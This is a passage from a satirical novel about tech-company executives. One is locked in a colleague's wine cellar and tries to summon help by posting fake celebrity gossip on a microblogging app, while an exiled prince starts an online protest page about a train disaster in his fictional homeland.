“I’ll let you export the moon minerals,” Gregor said. “You and your team will go down there and pull them out and — ”
“Minerals!” roared Niels, rocketing out of his chair. “My team sells internet advertising, Gregor, not minerals! Internet advertising!”
“Well, before they can sell the minerals, they need to get them out of the ground, so the selling part is sort of a moot point at this stage.”
“You want my sales team to become miners?”
Gregor looked puzzled. “Oh, I hadn’t really thought they would be the miners. But now that you suggest it, it’s not a bad idea. The skill sets do overlap, I suppose. The ‘core competencies,’ as you call them, are the same — dirt digging, rubbing elbows with worms, hunting for gold — ”
“Gregor!”
“One thing,” said Gregor, holding up his hand. “I don’t want you to get too excited. We can’t export minerals right away. It really doesn’t become economical until we build the space elevator, and that’s not on the roadmap until late next year.”
“Space elevator?!? You are going to sink this company!”
Niels knew it was time. He jumped onto his chair and stomped his feet. He waved his arms in the air again, willing his face redder and redder, sputtering a few expletives to express his outrage at Gregor’s ridiculous plan. While not all business meetings required such theatrics, almost one hundred percent of Niels’ negotiations involved either throwing a pen or stomping away from the table. He found it was often the best way to force a rapprochement from his opponent.
“Sit down,” said Gregor, pouring them both more wine. “You have nothing to be concerned about. Project Y is highly economical. By retaining our best engineers and protecting our most secret projects, we save hundreds of millions of dollars each year. And that’s before even calculating the potential upside from building the world’s first functioning utopia. Ultimately, we think this could generate tens of billions of dollars of new revenue.”
Niels slowly lowered his arms, but he wasn’t sure what to do with them. Feigned outrage was a tried-and-true technique — why hadn’t it worked this time? Just the previous week, Niels had used the same approach on the CEO of the world’s largest advertising firm, and in a matter of minutes the guy agreed to make his own car a surface for real-time Anahata ads.
He decided to continue standing on the chair. Niels threw his hands on his hips and puffed out his chest, then clenched his fists to make his biceps pop.
“So you’re going to put a whole bunch of male engineers alone on a planet, huh? Sounds to me like this will last up until you have your first system downtime and your engineers are no longer able to stream porn from Earth.”
Gregor said nothing for a few seconds, as if it took him a moment to understand.
“Oh,” he finally said. “No, we’ve thought of that already. There will be women.”
“I mean real women, not robots and avatar women. Or holograms,” said Niels, referring to the recent Anahata prom, for which Bobby had commissioned Japanese nurse holograms to accompany dateless engineers.
Gregor waved him away, but Niels wasn’t sure whether he was ignoring him or missing Niels’ swipe entirely.
“Our engineers have found ways to solve all of the many dangers that could befall a young society — famine, natural disaster, war. You think they can’t solve the simple problem of women? History has shown that if you give an engineer a problem, he usually can solve it. Again, that’s why our society will primarily be made up of engineers.”
“Most of your engineers can barely dress themselves,” sniffed Niels, staring down at Gregor from atop the chair. “Besides, I heard what happened last year at your winter retreat — hardly the outcome one would expect from superior beings.”
“I don’t know what you mean,” said Gregor, but the hint of a grimace suggested otherwise.
As part of a team-building exercise, Anahata had put its engineers into teams for a virtual trek through the Amazon. Along the way, the engineers were met with various obstacles — wild animals, tree loggers, and angry environmentalists.
“You know exactly what I’m talking about,” Niels said. “Your engineering teams abandoned sick and injured teammates just so that they could make it out of the Amazon first. A bunch of the employees got fed to anacondas.”
“We didn’t use real snakes,” Gregor protested.
“They left their teammates to die.”
“Only in a virtual world!” Gregor’s face burst in splotches of red.
“Your moon colony is a virtual world!”
A few seconds passed, then Gregor spoke.
“I agree it would have been good of our engineers to save their colleagues. But at least their motivation was pure — to escape the jungle on behalf of Anahata. This is why they are the ultimate citizens of our new society. They will always work for its greater benefit and not be led astray by the petty distractions that affect so many other people. Distractions like…”
Gregor’s eyes flashed.
“Distractions like pots of gold.”
It was clearly a dig. But last year’s sales incentive — in which Niels had promised a pot of authentic gold doubloons to any sales team member who doubled their returns in a quarter — had proved to be a brilliant motivational technique. Anahata had tripled its profits that year thanks to a bit of luck o’ the Irish. Niels wasn’t crazy; he was shrewd. And that, he believed, was the difference between him and the man seated below him. There was no reasoning with insanity.
“What do you want from me,” Niels asked, throwing his hands up. He was no longer certain of his next move. Should he come down from the chair? Or maybe it was best to speak to Bobby directly, though that also carried risks.
“Stop blocking my teams from testing on Shanley Field,” Gregor said. “Free up the servers in Eastern Africa. Basically, get out of our way. In exchange, I will give you full transparency into our plans and eventual access to the moon minerals.”
“No, I don’t like this,” Niels said. “It’s not right for Anahata. And what will the rest of the world think when they find out? Our shareholders will freak out and the stock price will tank.”
“It doesn’t matter. By the time they find out, we’ll be gone. On the moon. And once we’re there and things are up and running, it will be easy to prove that the model works.”
Niels sighed and shook his head. He was used to arguing over dollars in well-lit restaurants, not debating with a psychopath in his wine dungeon. It was time to play the Bobby card.
“I think we need to talk about this — seriously talk about this at a very, very long management meeting.”
Gregor’s face tightened. “There is nothing to talk about. Bobby agreed to this a long time ago.”
“Then Bobby’s going to need to come talk to me if he wants those servers in Africa. I’m not going to let you thwart the part of the company that makes all the money and funds your crazy ideas.”
Niels got down from the chair and took a step toward the stairs.
“Wait! We’re not done!” Gregor yelped.
Niels suppressed a grin. Clearly, all was not lost. He counted to five in his head, and slowly, slowly turned toward his prey.
“Maybe there is a way…”
“I’m sure we can find a compromise,” said Gregor, the slight tremble in his voice confirming Niels’ hunch.
Gregor was afraid Niels would turn Bobby against him. It never ceased to amaze him the things grown men feared. Niels feared no one.
“I want ads on Moodify,” Niels said.
Gregor’s face scrunched into a sour ball, then unfolded into a scowl before disappearing underneath his skin. A second later, it was as if his face had never hosted any expression at all.
“Listen,” said Niels, “you let me put ads on Moodify and I’ll support you one hundred percent in the moon colony project. Shanley Field, servers in Africa — I’ll even give you a few sales guys who can wash your engineers’ laundry on the moon.”
Niels held out his hand, but Gregor made no move toward him. For a minute, the two men stared at each other without moving.
“Putting ads on Moodify bracelets is bad for our users,” Gregor said.
Niels shrugged. “Okay, I’ll just discuss this with Bobby tomorrow and — ”
“Wait,” said Gregor, jumping out of his seat and moving quickly toward Niels. “There is something I have to show you.”
Gregor took a few slow steps backwards toward the stairs, as if his gaze could freeze Niels in place. He then turned and bounded up the steps, letting the door slide gently behind him.
Down below, Niels crossed his arms and yawned loudly.
But once Gregor was gone, Niels began to rub his temples. Why hadn’t he just gone into banking instead? Greedy capitalists were so much easier to negotiate with than engineers.
Five miles away, Arsyen Aimo was also thinking about money — namely, that thanks to his huge new salary, he was once again on the winning side of capitalism and ready to upgrade his entire life.
Part of that upgrade definitely involved getting a new girlfriend — preferably an American one with excellent teeth.
Of course, he already had a girlfriend, Natia, though that had happened somewhat by accident.
A year earlier, he had signed up to an online dating site as “Rick,” a blond surfer from Santa Cruz. Rick resembled an underwear model, with a chiseled body, defined jawline, and a strong nose echoing Arsyen’s own good looks.
The first woman he met was Natia — herself masking as a Romanian grad student at Berkeley. Between her mistaking Los Angeles for a Northern Californian city and Arsyen’s own English mistakes, they quickly called each other’s bluff and soon were speaking to each other in Pyrrhian.
They struck up a fast virtual friendship — not more than that initially, as they were both too practical to imagine dating someone thousands of miles away. Arsyen took pains to conceal his true identity. From his experience, once a Pyrrhian woman knew she was in the presence of an Aimo, all hopes of reasonable conversation dissolved in a puddle of sighs. Instead, he told her about living in America, about drive-through pharmacies and the endless array of flavored sparkling water, and the importance of sanitation engineers like Arsyen, who fixed the various clogs, stains, and crumbs that could slow the infrastructure of a fast-moving startup.
She in turn wrote to him about her life in Poodlekek, Pyrrhia’s capital. Natia worked as a switchboard operator for the national telecommunications firm, a graying dinosaur that was slowly moving Pyrrhia into the 1980s. She belonged to a political philosophy group, which met weekly to discuss why Marxism failed and whether man could subvert machine in a post-capitalist society. Arsyen found her little intellectual forays rather cute. There would be no need for political philosophy once royal reign was restored, but why discourage Natia from stretching her feminine brain in the meantime?
She was particularly passionate in her dislike of General (now President) Korpeko — the source of the Aimo family’s undoing. He was a “despot,” she wrote, “hell-bent on pushing sports and false achievements instead of encouraging the true prosperity of the nation.”
Among her many gripes was Korpeko’s obsession with the little-known sport of curling. He believed it was Pyrrhia’s ticket to international fame — sufficiently obscure as to ensure little competition from wealthier countries. Korpeko had replaced all the bike lanes and gutters along main roads with curling courts, and no vacations or trips outside the country were allowed during the first week of February, now known as Pyrrhian Curling Week. Arsyen’s stomach tightened each time he imagined Korpeko’s curling lanes snaking across Pyrrhia’s unmarred hills.
“It sounds nothing like the rich cultural life that once flourished under the royal family,” Arsyen wrote to Natia, thinking of the literary salons and long afternoon croquet matches his family hosted at their summer palace for the Pyrrhian elite. The king had generously ensured that vivid accounts of the affairs were published in all of the country’s newspapers so literate citizens could vicariously enjoy the experience.
“Do you remember the photos of them playing croquet atop their verdant courts?” Arsyen asked. “It was far more dignified.”
“Yes, I suppose if you consider hitting a ball a more civilized activity than rolling a puck,” Natia replied.
Natia’s lack of appreciation for croquet was one of the many shortcomings Arsyen had been forced to tolerate as a lowly janitor. Another was the mole on her cheek — it was just a little too big for his liking; he often found himself covering it up with his thumb whenever they did video chat.
Luckily, product managers didn’t have to put up with such defects. When product managers discovered problems, they fixed them. And that’s exactly what Arsyen planned to do.
With a fat new paycheck now coming his way, Arsyen was better equipped to find himself a beautiful American girl — someone like that hippie receptionist, Jennie. Then, when the time was right, he would return to Pyrrhia bronzed and wealthy, with his beautiful queen and her good orthodontics on display. Natia and the other women of Pyrrhia would weep at what they had lost, only able to take comfort in the possibility of becoming one of Arsyen’s bathing maidens.
So it was decided: Natia was out. The only question was whether to write her a breakup email now or first play his video game.
Arsyen opted for the video game. And there he was, a half-hour later, stuck on his couch, glued to his screen, when the phone rang.
It was the chief strategist with the Throne Reclamation Committee (the TRC).
“Have you heard the news? A train went off Golden Bridge and fell into the lake.”
“Mmmhmm,” said Arsyen, drawing his sword and piercing the heart of a castle guard. “It was probably a drunk conductor. Our trains are flawless.”
The national rail service had been one of the great Aimo accomplishments — christened by his father as “locomotives of progress and prosperity.” The king even had a toy train replica built to travel over their palace moat and directly into Arsyen’s bedroom. He wondered if that train was still there — particularly the first-class carriage, outfitted with miniature foodstuffs. As a teenager, Arsyen often threw the train’s gold-plated bison fries at his manservant Sklartar when the old man wasn’t moving fast enough.
“They say you could hear the screams of the children as the train flew through the air,” the strategist said, “that the flames moved across the sky like a rocket.”
“Huh,” said Arsyen, his thumb pumping up and down on the console button as he sliced through the head of one of the king’s henchmen. Tragedies often befell poor nations. There wasn’t much point in getting worked up over a handful of dead bodies.
The felled henchman rose, holding his head in his hands. He was coming back for more. As Arsyen pumped the console with his thumbs, the phone fell from his ear. No matter, if the news was that important, he was sure to hear from the TRC again. Nothing was going to interrupt his game. He had made it through his grueling first week at Anahata and deserved some downtime.
Arsyen glanced at his email on his way to the bathroom a few minutes later and saw that Natia had written. She too was obsessed with the train accident. She claimed the government had stopped any media from reporting the event, fearful that the news could put a damper on its bid to host the International Curling Championships the following year. Government workers had already begun repairing the bridge, and no effort was being made to dredge up the train. Meanwhile, the police were arresting anyone they believed was spreading rumors. All internet services were blocked in the capital, and Natia had been forced to travel outside the province to get to any café with open access. “If they find out I am here, they will arrest me, or worse!” she wrote. “Help us get the word out about what happened. Hundreds are dead!”
Arsyen had assumed the TRC had been talking about ten people. Hundreds of people elevated the train wreck to a national disaster — the kind of thing worthy of a future king’s attention.
“What would a king do…?” Arsyen wondered aloud, imagining himself laying his healing hands upon thousands of maimed Pyrrhians, their bodies draped in rags — rags he would eventually replace with velvet robes! — as they lay prostrate before him. They shielded their eyes from his divine light, and chanted his name to the ground below them. King Arsyen. King Arsyen.
He shook himself back to reality. His dream was still far off. Whatever happened in Pyrrhia now would certainly be repeated in a year’s time, with a new set of mothers rolled out to despair over the loss of their children at the hands of Korpeko’s corrupt and negligent government. He needed to be patient and let these minor catastrophes accumulate. At the point of ten train wrecks, the time might finally be right for a royal coup.
But in the meantime, Arsyen could at least give a nudge toward revolution and have some quick fun with Korpeko. If working in technology had taught him anything, it was that the internet loves a troll.
While working at Galt, Arsyen had learned about GaltPages — a popular tool that aggregated everything people had to say on all the different Galt apps. He even half-started his own GaltPage a few months earlier to promote his Aimo Air Freshener — a custom pink mixture he invented out of cleaning supplies so he could cover up the persistent stench of body odor that permeated the Galt meeting rooms. Its cotton candy scent would one day make Arsyen millions — provided he could figure out how to keep it from combusting.
He hadn’t gotten very far with his page back then, but Galt seemed to have made its product easier to use since he last tried. He could easily repurpose his early work to suit Natia’s social justice needs — the fluffy pink plume of cotton candy in the page’s background no longer suggesting a sweet scent but rather an artsy take on a nuclear holocaust. And, Arsyen told himself, there was a potential bonus to be had in all of this: If enough people were interested in what he posted about Poodlekek, he could collect their contact info and sell them his air freshener once all the furor died down.
Arsyen had worked in the Valley long enough to know that the key to social media was virality, not sincerity. So he renamed the page “Justice for Poodlekek” and posted Natia’s text about the accident, calling for action. He then posted the link to Justice for Poodlekek in the comment section of every Pyrrhian blog and newspaper article he could find and wrote a review of Korpeko’s government on the restaurant review site Help! Then he added pictures of Golden Bridge to his Photomatic account, using the retro and futuristic filters, as well as a bleaker one with a sprinkling of decapitated bodies.
Arsyen leaned back in his chair and put his hands behind his head. It was an awfully nice thing he had just done for Natia, and it would hopefully assuage her disappointment when he broke up with her in favor of dating Jennie.
He returned to his video game and quickly forgot about the page. But a while later, passing by his computer on the way to the kitchen, he saw that the previously blank comment section of Justice for Poodlekek now hosted a long list of responses. The view count was already in the thousands and climbing with each minute. Arsyen did a double take: People seemed to really be upset by this train thing. And not just the train, but about Korpeko and his government as well.
The street light has been out for two weeks. Why is there no bison milk on Mondays?
Arsyen squealed with delight. His people seemed so unhappy! He hit the refresh button again and again, each new complaint augmenting his euphoria.
Korpeko will drag our country into further poverty! I hate curling!
Arsyen couldn’t resist posting a comment under a fake name.
This never would have happened when the Aimos were in power!
Someone replied immediately.
That’s true. King Aimo would’ve made us play croquet until our fingers fell off.
Arsyen laughed. That had indeed happened to a few unlucky peasants who had trespassed on the royal croquet court.
As the minutes passed, complaints about bison milk were replaced by complaints about potholes, potholes by accusations of corruption, corruption by torture.
Arsyen did a small jig before his computer, then paused — first to check out his flexed biceps reflected on his computer screen, and then to update his page with a new message.
My people, we must take action!!
Of course, Arsyen knew President Korpeko would put it all down. That’s how it happened in Pyrrhia and the rest of the poor world. People protested and waved hand-painted signs, and then, if they weren’t disappeared by the government, they trudged back to work on Monday.
But Arsyen’s well-meaning but rather stupid Pyrrhian subjects couldn’t see that far ahead. Instead, the misery of Pyrrhia wrote itself across the Justice for Poodlekek page. The decay of the streets, the decay of the nation, the decay of everything, really, but the country’s gleaming curling lanes. The page’s followers swelled into the thousands within minutes. Soon they were asking about the creator of Justice for Poodlekek, calling on him to lead them forward.
It was terrible timing. He still had six levels to go in his video game.
“Men of action take action,” Arsyen said to himself, repeating a poster he had seen outside one of Anahata’s sales buildings.
He composed a short note to Natia:
My dear Natia, I have made a GaltPage to help you spread the word. Also, I am sorry but I think we will have to break up because I am not going to be able to come to Pyrrhia anytime soon.
Arsyen paused. What if Natia showed up one day in California without that unfortunate mole and wanted to sleep with him?
He began to type again.
Let me know if you ever come to California. Keep in touch!
Then he left the house to go grab a burrito. He needed some fuel to keep him going if he was going to conquer the six-headed henchman later that night.
Whatever Gregor Guntlag was trying to prove, Niels was determined to ignore it. He would meet Gregor’s final, desperate plea for cooperation with the same dismissal with which Gregor had treated Niels’ chair-jumping antics.
Niels pictured Gregor lugging the mysterious proof of his superior world order down the stairs, his combat boots thudding against the wooden steps, then stomping to the table. What did he want to show Niels? A philosophy book? A line of code? A diorama? Regardless, Niels’ expression would remain placid, unmoved, mouth silent in Guntlagian style until Gregor’s desperation grew to the point where Niels would only need to repeat three words: “Ads on Moodify.” Maybe he would even agree to let Niels put ads on employee T-shirts and the meeting-room chairs.
When had Gregor left exactly? Half an hour earlier? An hour? It was starting to seem like an awfully long time to leave someone waiting in a basement.
It was obvious what Gregor was trying to do. He had locked Niels in the cellar in order to assert his dominance and put Niels on edge. But these kinds of mind tricks and one-upmanship were old hat for a Master Negotiator. After all, Niels was the man who had challenged a quadriplegic music executive to a game of rugby; the man who hid E. coli in an opponent’s entree so he could pitch him on a business proposition as the other lay prostrate before the toilet for six hours. This wine cellar act was amateurish.
That said, why would a grown man lock a work colleague in his basement? Was that something Germans found funny? Or maybe Gregor was in fact Austrian. The Austrians were famous for their appreciation of basements. For a split second, Niels’ body tensed as he imagined Gregor descending the stairs in a pair of leather pants.
Niels closed his eyes, took a deep breath, and opened them again. He couldn’t help but respect his opponent for planting these seeds of doubt. Five minutes passed, then ten. Niels felt splinters from the chair making inroads into the back of his arms. Shapes emerged from the shadows, then receded. Another twenty minutes passed.
Niels knew he shouldn’t panic, but the shadows, the quiet, the unpredictability of his opponent all began to cloud his confidence. The longer he sat and paced and sat and paced, the more Niels became convinced that the taciturn Teuton was planning to leave him there all night, returning only once confident that he had broken the Master Negotiator.
Niels needed to plot his escape. From his shirt pocket, he pulled out the pen and pad of paper that he always carried with him. In a world of internet intangibles, Niels found reassurance in last-century items.
His high-level plan of attack was fairly easy to map. First, Niels needed to get himself out of the basement, and second, he needed to stop Gregor’s moon colony plan. (Third, he needed to destroy Gregor, though that was a longer-term goal that would require a separate strategy and PowerPoint deck.)
The question, of course, was how to go about these things. Niels considered the obvious — he could call another member of the management team. But as soon as Fischer, HR Paul, or Old Al showed up, Gregor would have some story ready and they would all have a good chuckle over Niels’ paranoia. Word would get out around Anahata, and even his own team would eventually find out about his panicked call for help. Exhilarated by the scent of weakness, the salesmen would circle him like the killer sharks he had trained them to be. It would be the end of him.
Instead, Niels sketched a mountain. At the base, he wrote, “Me.” At the summit, he wrote “FREEDOM.” Then he paused, realizing that he had failed to capture the full complexity of the situation. So he drew a second mountain next to the first. Now he had a mountain range. At the base of that second mountain, Niels wrote, “Gregor announces Moon Colony Plan.” At the top, he wrote, “I DESTROY the Moon Colony Plan!!!”
After a few minutes, and a few trees and shrubs added to his drawing for good measure, Niels had the entire route mapped, from base camp to summit. He was ready to go. He leaped out of his chair and did fifty jumping jacks, followed by one hundred situps, enjoying the rush of blood through his body. Niels would save Anahata from the worst decision it could ever make, and possibly even get Gregor fired in the process.
The first step was simple. He would ring Bobby and suggest that he pick Niels up at Gregor’s house for a midnight yoga class. Bobby was a sucker for yoga invites and had stated on numerous occasions that he wished the management team would chant together. Niels, for his part, thought yoga was the lazy man’s excuse for exercise, but like golf and wine, he saw value in its acquisition. Yoga had not only helped him meet several lonely housewives, but had also distinguished him as the only member of Bobby’s team who could execute Chaturanga Dandasana — providing a reasonable excuse for him to seed business ideas over sun salutations.
Niels pulled out his phone, selected Bobby’s number, and was soon hit by his mountain’s first boulder. There was no reception in Gregor’s basement.
He was not used to being knocked down so early in the game, but like a true sales champion, Niels rose quickly. “Only losers lose,” he whispered to himself, quoting one of the motivational posters in his office. He did five pushups with one hand, then jumped to his feet.
Niels tapped his phone’s email application and began to type:
Bobby, have just heard of a killer nighttime yoga studio in Mill Valley. Fantastic kombucha bar. I can get us in. Can you meet tonight? I’m at Gregor’s — stuck in his basement actually, funny story. Come grab me and we can head straight to the studio.
He paused. Would Bobby sense desperation? He needed to make his message appear as normal and Niels-like as possible.
Also, Gregor told me all about Project Y. Fascinating idea. I have some ideas about how we can monetize.
Niels smiled. He could feel his bed and a good night’s sleep within reach.
He pushed “send” and immediately began composing a second email, this time to HR Paul. Gregor’s insanity needed to be recorded somewhere — even if, in the short term, Niels had no intention of compromising Anahata’s public reputation, and his own financial stake in the company, by outing its head engineer as a psychopath.
Niels decided to attach a photo of himself in the basement. He raised his phone camera to get an angle that captured both the rows of wine bottles and the staircase leading up to a locked door. Then he hit “send” and took a swig of the Chateau Margaux — it would make for great bragging rights at next month’s HBS Successful Man Golf Tournament.
Niels opened the email application again, and his face fell. His email to Bobby hadn’t gone through. In its place was a time-out message — the data connection just wasn’t strong enough. Niels tried to send again, and then again and again, from different parts of the basement. But each time he was met with the same result.
The Master Negotiator was hit with a strong dose of reality — there was no phone connection, only a very weak data connection, and he was trapped in an Austrian psychopath’s basement.
Niels scanned the room. Aside from the bottles of wine, it was absolutely empty. The staircase led to the locked door on the first floor, but otherwise there were no windows and no way out. He couldn’t go to work. He couldn’t make money.
He couldn’t make money!
“No!!!” he screamed, kicking over one of the chairs. He bounded up the stairs and began pounding on the door. “Let me out! You can’t do this!”
Niels pounded for several minutes, but there was no answer from the other side.
Niels crumbled on the top step and was at first shocked, then horrified, then just miserable to discover that the wet feeling on his face was tears, actual man tears. His body shook, and he began to feel cold. He wanted his mother, or the ex-girlfriend he had cheated on, or even just that hippie receptionist he had slept with.
Or even God. Niels clasped his hands in prayer, unsure whether the gesture was necessary for the Almighty to hear him. Did God have to listen to him? Didn’t God love rich people?
Just in case, Niels apologized extra hard for ignoring Him the previous four decades and promised that he would be good from now on. He wouldn’t sleep with receptionists, he’d mentor inner-city entrepreneurs, and he’d teach the homeless how to code. He’d get rid of moon colonies and pop-up internet ads, and he’d fix piracy on the web once and for all. Above all, he’d be a good citizen and son and follower of whatever religion God turned out to belong to.
He looked down at the useless mobile phone in his hand. Tears had formed pathetic puddles across its surface, distorting his Flitter application, which now seemed to sprout wings from the “f” of its logo. Niels stared at it for a few seconds, watching the “f” heave under his tears, like a bird dreaming of flight.
And then it hit him. Flitter — Galt’s popular thought-sharing tool — was famous for working in the lowest-bandwidth parts of the world. They were always bragging in the press about how someone had used their tool to escape an oppressive regime. It drove Bobby crazy — he thought Anahata should have a monopoly on freedom and hope.
Niels didn’t care about any of that. In fact, he had zero interest in Galt or Flitter or in reading anyone’s thoughts other than his own. But a year earlier, he had tried to convince Galt to run Anahata’s ads on their apps and opened a Flitter account, Niels_1973, to show them he really cared about their product. But eventually the deal fell through, and other than a few half-hearted fleets about some Anahata sports matches, Niels’ account lay dormant for months. He had practically forgotten he even had it installed on his phone.
The likelihood Flitter would work in the cellar was low, but Niels had nothing to lose. He fired up Niels_1973 and, hands shaking, expressed his panic in fewer than one hundred thirty-five characters (the limit set on any Flitter message):
Help me! Trapped in basement at 13 Willow St, Atherton.
Niels hit “send,” and in a split second, the post was successfully transmitted. Niels jumped up from the step, pumping his fist in the air. “Yes!” he cheered. He sat back and waited.
And waited.
And waited.
Twenty minutes passed, and there was no response — no “we’re coming,” or “hold tight, buddy!” For a moment, Niels wondered whether his message had indeed been delivered — or fleeted, as the Flitterati would say. But he could see there were millions of other live fleets coming in from the rest of the world — fleets about politicians, fleets about celebrities, fleets from companies hawking their products, and fleets from celebrities hawking those same products. Clearly someone was getting through to someone.
The problem, Niels quickly realized, was that no one was listening to him. He had only two people following his fleets: agefshgr_74 and tina_xxx. Niels didn’t even know who they were or how they had found him in the first place.
“Failure is not an option,” Niels whispered to himself, repeating the Smeardon family motto. He took a gulp of Chateau Margaux and reminded himself that the important thing was that Flitter worked. The next step was simply to make it work better for him. He needed something more eye-catching — something that would get people so excited that they would want to refleet his message to all of their friends and followers.
He quickly settled on Tech Geek, the Valley’s hottest tech gossip site. Including the @techgeek Flitter handle was his best bet to be seen by someone following their account. So Niels tried again, decades of Chateau Margaux life force moving him into a new world of confidence:
@techgeek Love your hard-hitting tech analysis. Also: Help me! I’m a prisoner of #Anahata.
Up in San Francisco, Tech Geek’s social media manager stared at the fleet from Niels_1973 and groaned. Of all the Galt apps, Flitter definitely had the most crazies. There was something about giving people just one hundred thirty-five characters to express themselves that made them even more desperate — fueled by the hope that a bite-sized thought would be small enough to penetrate the world’s scattered attention.
It wasn’t just weirdos like Niels who drove him crazy. It was the number of people who didn’t properly understand Flittiquette. They exhibited a poor use of hashtags, a tendency to refleet every compliment or inane statement made by a follower, and an inability to craft something eye-popping in one hundred thirty-five characters.
Social media was a twenty-first-century art, and a true amateur (“in the French sense,” he explained to anyone who would listen, “meaning a lover of social media”) had to spend time honing his craft. He often reflected that his title should have been Master Craftsman of Social Media. Or simply God.
Because as far as he could tell, there was no job with more prestige. Sure, he told his friends, he could take a high-paying social media job at a big corporation, but that wasn’t his style. He didn’t want to be the guy fleeting “Not feeling fresh? Try the new #Summer_douche in fresh lavender.” He had done his college senior thesis on Che Guevara’s influence on scatological pop art. He could hardly sell out to the agro-chemico-industrial complex to be their social media plaything. He was part of an #online #revolution #disrupting #everything.
That’s why he was at Tech Geek, by all accounts the heart of the universe — or, at least, his universe, and the universe of anyone who mattered to him. Tech Geek was where all things tech and Valley were beating, throbbing, iterating, de-duping, compiling, normalizing, and randomizing. As far as he saw it, if you did social media for the Valley, you were, in many ways, the Valley. In fact, he liked to think of himself as a modern-day William Randolph Hearst. The decisions he made — whether to refleet someone’s comment, post a piece of news or gossip about another company, or (shock!) ignore it altogether — these were the things that made and broke powerful men and their companies.
So it annoyed him when fools like Niels_1973 would fleet things that were clearly false, just in the hope of grabbing his attention. It was irresponsible and a waste of his time. Niels_1973 was probably the same guy who had tried to send a “tip” to Tech Geek a few months earlier that Anahata had discovered Atlantis and was refurbishing it so that Bobby Bonilo could have an underwater pleasure kingdom. Or the guy who had fleeted that Anahata was suggesting its lowest-performing employees take performance-enhancing drugs. Granted, the latter proved to be true, but the source had missed a crucial detail. Anahata was randomizing who would get the drugs so they could analyze the effectiveness of the trial — a piece of research that would be helpful for the entire scientific community. #Detailsmatter
Niels_1973: @techgeek Love your hard-hitting tech analysis. Also: Help me! I’m a prisoner of #Anahata.
He reread the fleet and shook his head. He spent several minutes contemplating the various punishments he could mete out, finally deciding to block Niels_1973 from his list altogether. It was an extreme punishment, but he couldn’t condone such outrageous, attention-seeking behavior.
Then, feeling like he had done yet another great service for the world, Tech Geek’s social media manager called it a night and made his way to bed.
It took total isolation from the outside world for Niels to discover what millions of Galt fans around the world already knew: There was no longer any point in real conversation when you could just communicate in short phrases and poop emojis.
As night gave way to morning, Niels found himself deeply focused on a handful of celebrities and their preferred hair products and was closely following the reports of a burgeoning relationship between two contestants on a popular reality TV show. His concern for smooth hair and the couple’s happiness grew stronger as he finished off the bottle of Chateau Margaux, then opened a 1787 bottle of Chateau Lafite.
Niels’ innumerable fleets about captivity, despair, and Anahata had gone unanswered despite variations in text, creative spelling, and attempts at haiku. After hours of nonstop fleeting, there were still no refleets by his two followers, and still no acknowledgment from Tech Geek. Nor had he gained any new followers who could potentially spread the word on his behalf.
Ever the mountaineer, Niels devised a new plan, with a new mountain range that showcased the complexity (but also the conquerability!) of his current situation. This was one of his favorite mountain-range models to use at work. It had switchbacks and a very large boulder. The point, he often told his team, was to not get distracted by the boulder and to stay focused on the switchbacks.
Flitter users were switchbacks.
No, they were boulders.
Well, whatever they were, they weren’t the point. The point was, he had been foolish to think that people on Flitter would care about him, Niels Smeardon. What they cared about was the content he himself had been sucked into — the celebrities, the gossip, the lifestyle guru tips. The trick was to make these idiots care about him through his connection to the people they worshipped. They were like lichen growing on top of the boulder. Or maybe the sign at the bottom of the mountain marking the trail. Or…
“I don’t need mountains,” Niels growled. “Mountains need ME.”
He crumpled the paper and tossed it to the ground, then immediately started fleeting again.
His first pass was a flop, despite referencing the biggest pop star on the planet — the sexy blonde singer named La Lala who was known for hitting high notes while writhing on the floor with pythons.
#OMG LaLala making new video with #Liberace! A duet with a legend!
The only reaction came from Tina_xxx, who removed herself from his list of two followers. No one else responded to his fleet.
Niels sipped some wine and took a few minutes to study the most popular fleets about La Lala. Then he tried again.
#LaLala sings at #Nashville high school, discourages #bullies. Wears pythons in school uniform. Such an #inspiration!
Niels doubted La Lala had ever been to Nashville. But no matter, within minutes, he had been refleeted. There was even a string of responses, most of them from Lala fans in Nashville asking where she had sung. Niels responded:
My friend said #EmersonHigh. She wore band aids instead of clothes!!
Within a few seconds, he had two new people following his account. He stretched his fingers and typed his next set of messages.
#LaLala wears no makeup to remind us that talent is more important than beauty. #LaLala pythons remind us that in every snake is a beating heart. #LaLala spotted at #LAX, straddling a plane. Anyone have pictures?
The popularity of Niels_1973 began to climb. The more inane his posts, the more misspellings and melodrama (driven more by inebriation than calculation), the more followers he gained. Niels felt his blood begin to pump again. He gave one of his help me! posts a go, just to see if someone would respond. But despite having amassed four thousand followers in thirty minutes, all hanging on every word he had to say about La Lala, there didn’t seem to be anyone interested in helping the man behind the fleets.
Niels scratched his head, then returned to his notepad. He drew a SWOT analysis listing the strengths, weaknesses, opportunities, and threats of his pop star. When he hit the “weaknesses” box, he realized his error: La Lala skewed toward a much younger audience. Was it really plausible that a pimply fourteen-year-old fan would come to his rescue?
Niels groaned. His demographic targeting had been all wrong. La Lala fans were too young. He needed serious people. People who had driver’s licenses. People who thought a bit more about the consequences of social media. People like…thirty-year-olds.
Niels flipped back to the Flitter homepage to study the most popular age-appropriate topics. What were people fleeting about on a random Monday morning? Scrolling through the list, Niels saw that most of the topics were things he knew nothing about. In addition to the perennial pop music favorites, the list included things like #bitchslap, #whatimknitting, and #blessedmoments. Niels kept scanning, moving farther and farther down the list. And then he saw it: #Poodlekek.
“Yes!”
Niels knew all about Poodlekek. It was his friend’s heavy metal band in college. He was surprised they were still together after two decades, let alone had become so popular. He remembered going to their shows at the campus coffee house, cigarette lighter waving in the air as he and his then-girlfriend sang to guitar-heavy ballads about twisted love, rocky family relationships, and starving children in Ethiopia. Their fans would likely be Niels’ age, the kind of people who would take seriously his cries for help. And Niels had plenty of interesting things he could fleet about them to get people’s attention — like the lead singer’s bad case of the Herp. Women would totally refleet that.
But first things first. He needed to build a new fan base. Niels kicked off his first Poodlekek fleet with a bit of nostalgia.
Raise your lighters for #Poodlekek
Arsyen rose from his bed, ready to conquer an American woman.
It would not be his first attempt. He had made several passes at courtship since arriving in the United States, but most women were too intimidated by his overwhelming virility.
But Jennie, the Anahata receptionist, struck Arsyen as the confident type. She shook his hand without averting her gaze and even scolded him during their campus tour when he complimented Galt. He liked a sassy lady with good teeth.
He had the day all planned out. After lunchtime, he’d surprise Jennie in the reception area and give her his Aimo Air Freshener. Then, after a bit of chitchat, he’d suggest they head to his apartment for some video games and sex. It would be the perfect first date.
The only potential hiccup was keeping his words straight. He wondered whether Sven would practice his English with him that morning.
But Arsyen had no such chance. Sven greeted him as he entered their cubicle, waving a hand bloodied by jelly doughnut. Jennie — his Jennie — was standing next to Sven.
